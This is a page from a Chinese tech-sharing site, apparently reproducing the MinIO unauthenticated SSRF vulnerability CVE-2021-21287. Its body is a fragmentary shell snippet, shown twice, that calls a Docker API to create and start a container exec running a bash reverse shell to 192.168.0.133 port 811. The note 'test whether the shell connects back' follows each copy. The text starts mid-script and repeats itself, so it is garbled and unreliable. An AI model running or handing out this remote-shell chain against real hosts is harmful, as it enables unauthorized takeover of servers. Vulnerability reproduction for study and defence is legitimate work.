USB迷 | 专注于互联网分享

    最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。
    你的位置: 首页 > IT圈 > MinIO未授权SSRF漏洞(CVE-2021-21287)漏洞复现

    MinIO未授权SSRF漏洞(CVE-2021-21287)漏洞复现

    IT圈 admin 69浏览 0评论

    2024年3月25日发(作者:饶芸静)

    echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/192.168.0.133/811 0>&1"]}" | jq -r ".Id")';

    echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"';

    } | bash

    然后发送请求。测试是否反弹shell

    2024年3月25日发(作者:饶芸静)

    echo 'execid=$(curl -s -X POST "${target}/containers/${id}/exec" -H "Content-Type: application/json" --data-binary "{"Cmd": ["bash", "-c", "bash -i >& /dev/tcp/192.168.0.133/811 0>&1"]}" | jq -r ".Id")';

    echo 'curl -s -X POST "${target}/exec/${execid}/start" -H "Content-Type: application/json" --data-binary "{}"';

    } | bash

    然后发送请求。测试是否反弹shell

    继续浏览有关 的文章

    与本文相关的文章

    发布评论

    评论列表 (0)

    1. 暂无评论